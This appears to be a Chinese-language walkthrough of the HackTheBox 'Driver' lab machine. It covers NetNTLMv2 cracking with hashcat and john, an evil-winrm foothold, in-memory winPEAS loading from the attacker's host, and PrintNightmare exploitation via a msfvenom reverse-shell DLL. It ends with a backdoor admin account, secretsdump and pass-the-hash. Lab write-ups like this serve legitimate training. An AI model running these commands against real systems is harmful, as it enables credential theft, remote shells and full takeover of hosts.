tony::DRIVER:d1ef10087e82a7bb:4F1C96A969B8A4E19054D8E80160E028:010100000000000000B9E32944A5DA01521BA2EBA144813F0000000002000800530046004E00570001001E00570049004E002D00420038003700450052005600380047004F005500450004003400570049004E002D00420038003700450052005600380047004F00550045002E00530046004E0057002E004C004F00430041004C0003001400530046004E0057002E004C004F00430041004C0005001400530046004E0057002E004C004F00430041004C000700080000B9E32944A5DA01060004000200000008003000300000000000000000000000002000003754E27C9803F40A182B2657EB8193AA5EB370597B636D83AE5AB2CE59E879CA0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003900000000000000000000000000

注意观察每次的hash都不同：

这是ntlmv2的hash，机制决定了即使同⼀个⽤户，密码⼀直没变，ntlmv2的值也会不同。因为在NTLMv2的认证过程中，服务器会⽣成⼀个随机数作为挑战给客户端。这个挑战是随机的，每次认证请求都会不同，因此即使是相同的⽤户和密码，响应也会因为服务器挑战的不同⽽不同。除了服务器挑战之外，NTLMv2协议还允许客户端⽣成⾃⼰的挑战，这同样是⼀个随机数。客户端挑战也会被包含在最终的响应中。NTLMv2 的响应中通常还会包含⼀个时间戳，这个时间戳是认证发⽣时的具体时间点。时间戳的加⼊进⼀步增加了每次响应的唯⼀性。所以如上应该是⼀个⽤户的认证。

这个hash怎么⽤，能hash传递吗？

• 答案是不能的，因为这个hash的⽣成值⾥⾯有随机值，还有时间戳，不能做hash重⽤，所以要⽤也只能破解。

---

先识别⼀下ntlmv2的模式类型

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ hashcat --help | grep -i ntlm
 5500 | NetNTLMv1 / NetNTLMv1+ESS | Network
Protocol
 27000 | NetNTLMv1 / NetNTLMv1+ESS (NT) | Network
Protocol
 5600 | NetNTLMv2 | Network
Protocol
 27100 | NetNTLMv2 (NT) | Network
Protocol
 1000 | NTLM |
Operating System

不难判断是5600，也可以借助⼯具识别，我们现在不是识别类型，类型我们已经知道，responder的结果就说了类型了，是想知道hashcat破解时的mode。所以且不说hash-identifier识别的准还是不准，功能上就不满⾜。

其实说起来hash-identifier的屡屡识别不准，所以有一个更好的工具推荐：nth:name that hash

github仓库：(https://github.com/HashPals/Name-That-Hash)

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$nth --file digest-only
_   _                           _____ _           _          _   _           _     
 | \ | |                         |_   _| |         | |        | | | |         | |    
 |  \| | __ _ _ __ ___   ___ ______| | | |__   __ _| |_ ______| |_| | __ _ ___| |__  
 | . ` |/ _` | '_ ` _ \ / _ \______| | | '_ \ / _` | __|______|  _  |/ _` / __| '_ \ 
 | |\  | (_| | | | | | |  __/      | | | | | | (_| | |_       | | | | (_| \__ \ | | |
 \_| \_/\__,_|_| |_| |_|\___|      \_/ |_| |_|\__,_|\__|      \_| |_/\__,_|___/_| |_|

https://twitter.com/bee_sec_san
https://github.com/HashPals/Name-That-Hash 
    

tony::DRIVER:9805a1c04bcadcbd:B23D7CAC6F424B16DA5B0B0A56608376:010100000000000000C1C8116E3CDB017864C07A9ED9F9FE0000000002000800570049003100310001001E00570049
004E002D004D00410047004400570036004E00590058003700380004003400570049004E002D004D00410047004400570036004E0059005800370038002E0057004900310031002E004C004F00430
041004C000300140057004900310031002E004C004F00430041004C000500140057004900310031002E004C004F00430041004C000700080000C1C8116E3CDB010600040002000000080030003000
0000000000000000000000200000E84091EDC9060A2C78784CFED332099AC1E648A1B661A74F6722500F56FBED190A0010000000000000000000000000000000000009001E0063006900660073002
F00310030002E00310030002E00310036002E003400000000000000000000000000

Most Likely 
NetNTLMv2, HC: 5600 JtR: netntlmv2


tony::DRIVER:5eee6d97b85bf7b1:D3527A19F9F7B21D0D86DCAF12F8CBDA:010100000000000000C1C8116E3CDB0187D6F7292FC2FA790000000002000800570049003100310001001E00570049
004E002D004D00410047004400570036004E00590058003700380004003400570049004E002D004D00410047004400570036004E0059005800370038002E0057004900310031002E004C004F00430
041004C000300140057004900310031002E004C004F00430041004C000500140057004900310031002E004C004F00430041004C000700080000C1C8116E3CDB010600040002000000080030003000
0000000000000000000000200000E84091EDC9060A2C78784CFED332099AC1E648A1B661A74F6722500F56FBED190A0010000000000000000000000000000000000009001E0063006900660073002
F00310030002E00310030002E00310036002E003400000000000000000000000000

Most Likely 
NetNTLMv2, HC: 5600 JtR: netntlmv2


tony::DRIVER:a274086f3be17782:9D5C4FED126604E4FFE741A4B60AA002:010100000000000000C1C8116E3CDB0172B29D84DB7945250000000002000800570049003100310001001E00570049
004E002D004D00410047004400570036004E00590058003700380004003400570049004E002D004D00410047004400570036004E0059005800370038002E0057004900310031002E004C004F00430
041004C000300140057004900310031002E004C004F00430041004C000500140057004900310031002E004C004F00430041004C000700080000C1C8116E3CDB010600040002000000080030003000
0000000000000000000000200000E84091EDC9060A2C78784CFED332099AC1E648A1B661A74F6722500F56FBED190A0010000000000000000000000000000000000009001E0063006900660073002
F00310030002E00310030002E00310036002E003400000000000000000000000000

Most Likely 
NetNTLMv2, HC: 5600 JtR: netntlmv2

通过一番交叉验证没错就是5600，开始破解，期待能破解出来：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo hashcat -m 5600 digest-only /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM
16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==============================================================================
====================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz, 2901/5866
MB (1024 MB allocatable), 6MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 13 digests; 13 unique digests, 13 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
TONY::DRIVER:f3b3193dcd56559c:2c56932f901f3e22b131998179c8ff0b:010100000000000000b9e32944a5da01a594e191ec8f658e0000000002000800530046004e00570001001e00570049004e002d00420038003700450052005600380047004f005500450004003400570049004e002d00420038003700450052005600380047004f00550045002e00530046004e0057002e004c004f00430041004c0003001400530046004e0057002e004c004f00430041004c0005001400530046004e0057002e004c004f00430041004c000700080000b9e32944a5da01060004000200000008003000300000000000000000000000002000003754e27c9803f40a182b2657eb8193aa5eb370597b636d83ae5ab2ce59e879ca0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000:liltony
TONY::DRIVER:49820e408dbb146c:fbd317352b55da9cd0162104258561a6:010100000000000000b9e32944a5da01ba9bbd100e206bc50000000002000800530046004e00570001001e00570049004e002d00420038003700450052005600380047004f005500450004003400570049004e002d00420038003700450052005600380047004f00550045002e00530046004e0057002e004c004f00430041004c0003001400530046004e0057002e004c004f00430041004c0005001400530046004e0057002e004c004f00430041004c000700080000b9e32944a5da01060004000200000008003000300000000000000000000000002000003754e27c9803f40a182b2657eb8193aa5eb370597b636d83ae5ab2ce59e879ca0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000:liltony
TONY::DRIVER:12430e8b200482bf:87e6078fdc62c2034ca53a176e141648:010100000000000000b9e32944a5da01526894628d5aa73e0000000002000800530046004e00570001001e00570049004e002d00420038003700450052005600380047004f005500450004003400570049004e002d00420038003700450052005600380047004f00550045002e00530046004e0057002e004c004f00430041004c0003001400530046004e0057002e004c004f00430041004c0005001400530046004e0057002e004c004f00430041004c000700080000b9e32944a5da01060004000200000008003000300000000000000000000000002000003754e27c9803f40a182b2657eb8193aa5eb370597b636d83ae5ab2ce59e879ca0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000:liltony

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: digest-only
Time.Started.....: Mon May 13 15:52:45 2024 (0 secs)
Time.Estimated...: Mon May 13 15:52:45 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2558.4 kH/s (0.95ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 13/13 (100.00%) Digests (total), 13/13 (100.00%) Digests
(new), 13/13 (100.00%) Salts
Progress.........: 439296/186477005 (0.24%)
Rejected.........: 0/439296 (0.00%)
Restore.Point....: 30720/14344385 (0.21%)
Restore.Sub.#1...: Salt:12 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: !!!!!! -> redlips
Hardware.Mon.#1..: Util: 30%
Started: Mon May 13 15:52:44 2024
Stopped: Mon May 13 15:52:47 2024

很快破解出来 tony:liltony 这组凭据。其实⽤john也是可以的

sudo john digest-only --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt --pot=driver.pot

这里后面记得加上--pot=driver.pot类似于生成一个日志，后续多次爆破如果爆破成功他是不显示的，但加上这个无论有无缓存后都会打印出来。

建立系统立足点：tony的shell

先⽤netexec 测试⼀下：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo nxc winrm driver.htb -u tony -p liltony
WINRM 10.129.40.36 5985 DRIVER [*] Windows 10.0 Build 10240 (name:DRIVER) (domain:DRIVER)
WINRM 10.129.40.36 5985 DRIVER [+] DRIVER\tony:liltony (Pwn3d!)

wow! 直接pwned！登录上去：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo evil-winrm -i driver.htb -u tony -p liltony
Evil-WinRM shell v3.5 
Warning: Remote path completions is disabled due to ruby limitation:
quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub:
https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> whoami
driver\tony
*Evil-WinRM* PS C:\Users\tony\Documents> hostname
DRIVER
*Evil-WinRM* PS C:\Users\tony\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
 Connection-specific DNS Suffix . : .htb
 IPv6 Address. . . . . . . . . . . : dead:beef::be
 IPv6 Address. . . . . . . . . . . : dead:beef::c9c2:bfe:78b2:d9aa
 Temporary IPv6 Address. . . . . . : dead:beef::35c0:d063:86f2:571f
 Link-local IPv6 Address . . . . . : fe80::c9c2:bfe:78b2:d9aa%5
 IPv4 Address. . . . . . . . . . . : 10.129.40.36
 Subnet Mask . . . . . . . . . . . : 255.255.0.0
 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%5
 10.129.0.1
Tunnel adapter isatap..htb:
 Media State . . . . . . . . . . . : Media disconnected
 Connection-specific DNS Suffix . : .htb

虽然是pwned，但是还不到系统管理员权限。看到有user.txt，拿下来：

*Evil-WinRM* PS C:\Users\tony\Documents> gc C:\users\tony\Desktop\user.txt
55f978defaced401d0021f365553d7b7

提权枚举

提权最先要看的是web的配置⽂件，先定位web⽬录，⼀般是在c盘的inetpub下，去搜⾸⻚的图⽚，就可以定位到。

powershell命令：
Get-ChildItem -Path C:\ -Filter ricoh.png -Recurse -ErrorAction SilentlyContinue

命令可以简写成：
gci C:\ ricoh.png -Recurse -ErrorAction SilentlyContinue

然后查看源码：

PS C:\inetpub\wwwroot> gc fw_up.php

简单翻找之后，没有什么收获，决定⽤winpeas进⾏⾃动化枚举。在官⽅github库Release⻚下载应⽤。

https://github.com/peass-ng/PEASS-ng/releases/tag/20240512-3398870e

下载后保存在kali的⼯作路径下，并通过简易web服务提供下载⽀持。最佳实践的教程⻅这个链接，当然也是官⽅教程主⻚：

https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe

形成如下两条待执⾏的命令，以便以反射的⽅式在内存中执⾏⽆⽂件本地提权枚举:

Set-ExecutionPolicy Unrestricted -Scope CurrentUser

$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "http://10.10.16.2:8888/winPEASx64_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("log")

但是没有正常执⾏：可以在本地做实验不演示。

这可能与当前会话的uac策略等有关，⽆论如何不能⽆⽂件执⾏，那只能冒险本地执⾏了。

建议在公共⽬录建⽴⼯作⽂件夹操作，我是建⽴了apps⽂件夹，以获得清晰的操作场景：

*Evil-WinRM* PS C:\Users\tony\Documents> cd c:\programdata\;mkdir apps;cd apps

执⾏⼀下，考虑执⾏⽇志可能偏⻓，容易超过终端缓冲区⼤⼩，按照Winpeas的帮助建议，我们指定log参数。

*Evil-WinRM* PS C:\programdata\apps> .\winPEASx64_ofs.exe log

保存到日志文件中，然后download到本地。

*Evil-WinRM* PS C:\programdata\apps> download out.txt
Info: Downloading C:\programdata\apps\out.txt to out.txt
Info: Download successful!

然后⽤ cat out.txt | less -R 以获得着⾊的、交互好的浏览界⾯。也可以用batcat查看，使用apt install bat下载

好的，逐⼀分析吧！重点看红⾊的内容。一定要多看！！！！

#历史记录在此
*Evil-WinRM* PS C:\programdata\apps> gc
C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleH
ost_history.txt

Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriverV4.23' -PortName 'lpt1:'

和前端看到的类似，有很多打印相关的内容

前台以及后端众多打印、打印机相关的信息，提示我们，对打印服务和相关漏洞要关注了。

这是nxc中的可⽤模块：

┌──(kali㉿kali)-[~/aptlabs]
└─$ sudo nxc smb -L 
LOW PRIVILEGE MODULES
[*] add-computer Adds or deletes a domain computer
[*] dfscoerce Module to check if the DC is vulnerable to
DFSCocerc, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc Drop a searchConnector-ms file on each writable
share
[*] enum_av Gathers information on all endpoint protection
solutions installed on the the remote host(s) via LsarLookupNames (no
privilege needed)
[*] gpp_autologin Searches the domain controller for registry.xml
to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other
information for accounts pushed through Group Policy Preferences.
[*] ioxidresolver This module helps you to identify hosts that
have additional active interfaces
[*] ms17-010 MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB
ENVIRONMENT
[*] nopac Check if the DC is vulnerable to CVE-2021-42278
and CVE-2021-42287 to impersonate DA from standard domain user
[*] petitpotam Module to check if the DC is vulnerable to
PetitPotam, credit to @topotam
[*] printnightmare Check if host vulnerable to printnightmare
[*] scuffy Creates and dumps an arbitrary .scf file with
the icon property containing a UNC path to the declared SMB server against all
writeable shares
[*] shadowcoerce Module to check if the target is vulnerable to
ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky Creates windows shortcuts with the icon
attribute containing a UNC path to the specified SMB server in all shares with
write permissions
[*] spider_plus List files recursively and save a JSON sharefile metadata to the 'OUTPUT_FOLDER'. See module options for finer
configuration.
[*] spooler Detect if print spooler is enabled or not
[*] webdav Checks whether the WebClient service is running
on the target
[*] zerologon Module to check if the DC is vulnerable to
Zerologon aka CVE-2020-1472
HIGH PRIVILEGE MODULES (requires admin privs)
[*] bh_owned Set pwned computer as owned in Bloodhound
[*] empire_exec Uses Empire's RESTful API to generate a launcher
for the specified listener and executes it
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] firefox Dump credentials from Firefox
[*] get_netconnections Uses WMI to query network connections.
[*] handlekatz Get lsass dump using handlekatz64 and parse the
result with pypykatz
[*] hash_spider Dump lsass recursively from a given hash using
BH to find local admins
[*] iis Checks for credentials in IIS Application Pool
configuration files using appcmd.exe
[*] impersonate List and impersonate tokens to run command as
locally logged on users
[*] install_elevated Checks for AlwaysInstallElevated
[*] keepass_discover Search for KeePass-related files and process.
[*] keepass_trigger Set up a malicious KeePass trigger to export the
database in cleartext.
[*] lsassy Dump lsass and parse the result remotely with
lsassy
[*] masky Remotely dump domain user credentials via an
ADCS and a KDC
[*] met_inject Downloads the Meterpreter stager and injects it
into memory
[*] msol Dump MSOL cleartext password from the localDB on
the Azure AD-Connect Server
[*] nanodump Get lsass dump using nanodump and parse the
result with pypykatz
[*] ntdsutil Dump NTDS with ntdsutil
[*] ntlmv1 Detect if lmcompatibilitylevel on the target is
set to 0 or 1
[*] pi Run command as logged on users via Process
Injection
[*] procdump Get lsass dump using procdump64 and parse the
result with pypykatz
[*] rdcman Remotely dump Remote Desktop Connection Manager
(sysinternals) credentials
[*] rdp Enables/Disables RDP
[*] reg-query Performs a registry query on the machine
[*] runasppl Check if the registry value RunAsPPL is set or
not
[*] schtask_as Remotely execute a scheduled task as a logged on
user
[*] teams_localdb Retrieves the cleartext ssoauthcookie from the
local Microsoft Teams database, if teams is open we kill all Teams process
[*] test_connection Pings a host
[*] uac Checks UAC status
[*] veeam Extracts credentials from local Veeam SQL
Database
[*] wcc Check various security configuration items on
Windows machines
[*] wdigest Creates/Deletes the 'UseLogonCredential'
registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery Kicks off a Metasploit Payload using the
exploit/multi/script/web_delivery module
[*] wifi Get key of all wireless interfaces
[*] winscp Looks for WinSCP.ini files in the registry and
default locations and tries to extract credentials.

查询相关资料：

Print Spooler 服务是 Windows操作系统中⽤于管理打印任务的⼀个关键组件。它使⽤户可以在后台处理打印作业，使得打印机可以按照顺序处理多个打印任务，同时⽤户可以继续执⾏其他操作，⽽不必等待当前打印作业完成。

先确认下spooler的服务状态：

┌──(kali㉿kali)-[~/aptlabs]
└─$ sudo nxc smb driver.htb -u tony -p liltony -M spooler 
SMB 10.129.220.192 445 DRIVER [*] Windows 10 Enterprise
10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB 10.129.220.192 445 DRIVER [+] DRIVER\tony:liltony 
SPOOLER 10.129.220.192 445 DRIVER Spooler service enabled

Spooler是激活的，搜索不难发现如下RCE关键词：

那就有必要进⼀步看是否有PrintNightmare了。

┌──(kali㉿kali)-[~/RedteamNotes/aptlabs]
└─$ sudo nxc smb driver.htb -u tony -p liltony -M spooler -M printnightmare
SMB 10.129.220.192 445 DRIVER [*] Windows 10 Enterprise
10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB 10.129.220.192 445 DRIVER [+] DRIVER\tony:liltony 
SPOOLER 10.129.220.192 445 DRIVER Spooler service enabled
PRINTNIG... 10.129.220.192 445 DRIVER Vulnerable, next step https://github.com/ly4k/PrintNightmare

没错，Vulnerable！有PrintNightmare漏洞。

PrintNightmare打印噩梦，是指⼀系列影响 Windows 打印后台处理程序服务（Print Spooler）的远程代码执⾏（RCE）和本地提权（LPE）漏洞。这些漏洞允许攻击者通过⽹络或本地访问执⾏任意代码，从⽽完全控制受影响的系统。PrintNightmare 的主要漏洞编号包括 CVE-2021-1675 和 CVE-2021-34527。

利⽤⽅式nxc的校验给链接了，那就直接看能不能利⽤：https://github.com/ly4k/PrintNightmare

检测⼀下是否可利⽤：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ ./printnightmare.py -check 'tony:liltony@driver.htb' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target appears to be vulnerable!

我直接给出利用过程：

进⼀步确定，可以利⽤，信⼼继续增加。按照printnightmare.py帮助⽂档的⽅法，先⽣成反弹shell的dll⽂件：
┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.2 LPORT=9595 -f dll -o RedteamNotes.dll

上传：
*Evil-WinRM* PS C:\programdata\apps> upload /home/kali/HackTheBox/Driver/RedteamNotes.dll

做好9595端⼝的nc监听，然后执⾏利⽤,也可以msfconsole开启监听一样的：
┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ ./printnightmare.py -dll 'C:\programdata\apps\RedteamNotes.dll'


虽然报错了但是成功反弹！
system！！！

持久化

增加⽤户凭据 test:20031216abcD ：

net user test 20031216abcD /add

net localgroup administrators test /add

转储secrets：

┌──(kali㉿kali)-[~/HackTheBox/Driver]
└─$ sudo impacket-secretsdump ' test:20031216abcD'@driver.htb 
[sudo] password for kali: 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe5b3cda034afd685bc69ccd3c4e9387c
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d1256cff8b5b5fdb8c327d3b6c3f5017:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0
.
.
.
.

转储到administrator的hash，确认⼀下：哈希传递

┌──(kali㉿kali)-[~/RedteamNotes/aptlabs]
└─$ sudo nxc winrm driver.htb -u Administrator -H d1256cff8b5b5fdb8c327d3b6c3f5017 -X 'whoami;hostname;ipconfig;gci C:\Users *.txt -r;gci C:\Users *.txt -r | % { gc $_.FullName }'

可以获得持久化的⽅式：

┌──(kali㉿kali)-[~/RedteamNotes/HackTheBox/Driver]
└─$ sudo evil-winrm -i driver.htb -u Administrator -H d1256cff8b5b5fdb8c327d3b6c3f5017

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami;hostname;ipconfig
driver\administrator
DRIVER
Windows IP Configuration
Ethernet adapter Ethernet0:
 Connection-specific DNS Suffix . : .htb
 IPv6 Address. . . . . . . . . . . : dead:beef::193
 IPv6 Address. . . . . . . . . . . : dead:beef::3939:b17c:cbe6:b12
 Temporary IPv6 Address. . . . . . : dead:beef::b930:f85:d4b7:e7a3
 Link-local IPv6 Address . . . . . : fe80::3939:b17c:cbe6:b12%5
 IPv4 Address. . . . . . . . . . . : 10.129.40.36
 Subnet Mask . . . . . . . . . . . : 255.255.0.0
 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%5
 10.129.0.1
Tunnel adapter isatap..htb:
 Media State . . . . . . . . . . . : Media disconnected
 Connection-specific DNS Suffix . : .htb

⾄此，已获得机器的完全控制权！！！！！！！

总结：

nmap扫描之后，发现smb⽆访问权限，80端⼝需要登陆，弱密码或简单爆破之后，看到打印机固件测试功能⻚⾯，web渗透⽆果，综合分析攻击⾯，确定内⽹嗅探的办法，利⽤SCF⽂件产⽣流量和ntlmv2认证，嗅探后获得hash，破解后获得⽴⾜点，提权⽤了Winpeas枚举，以及nxc验证，利⽤PrintNightmare漏洞获得了系统权限 ，盲打的话不算特别简单，相对来说把知识点进行了各种有机结合很实用的一个靶机！